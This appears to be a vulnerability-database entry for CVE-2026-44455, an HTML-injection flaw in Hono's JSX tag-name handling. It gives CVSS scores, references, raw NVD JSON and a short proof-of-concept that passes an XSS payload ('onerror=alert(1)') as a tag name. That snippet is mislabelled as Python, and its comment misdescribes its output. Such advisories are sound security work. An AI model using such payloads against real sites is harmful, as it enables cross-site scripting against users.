CVE-2026-44455

Description

Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.16, Improper handling of JSX element tag names in hono/jsx allowed unvalidated tag names to be directly inserted into the generated HTML output. When untrusted input is used as a tag name via the programmatic jsx() or createElement() APIs during server-side rendering, specially crafted values may break out of the intended element context and inject unintended HTML. This vulnerability is fixed in 4.12.16.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:* - VULNERABLE

Hono < 4.12.16

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Vulnerable code example
import { jsx } from 'hono/jsx';

// Simulated user-controlled input acting as a tag name
const userTag = '<img src=x onerror=alert(1)>';

// Rendering with untrusted input as tag name
const result = jsx(userTag, {});
console.log(result);
// Output will contain the injected script tag, leading to XSS.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44455
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44455
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44455/
[4] VulDB https://vuldb.com/cve/CVE-2026-44455
[5] https://github.com/honojs/hono/security/advisories/GHSA-69xw-7hcm-h432

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44455", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:57.433", "lastModified": "2026-05-13T18:35:24.373", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.16, Improper handling of JSX element tag names in hono/jsx allowed unvalidated tag names to be directly inserted into the generated HTML output. When untrusted input is used as a tag name via the programmatic jsx() or createElement() APIs during server-side rendering, specially crafted values may break out of the intended element context and inject unintended HTML. This vulnerability is fixed in 4.12.16."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "4.12.16", "matchCriteriaId": "D9D38D7B-A561-44B9-8571-C5241E5F36DE"}]}]}], "references": [{"url": "https://github.com/honojs/hono/security/advisories/GHSA-69xw-7hcm-h432", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}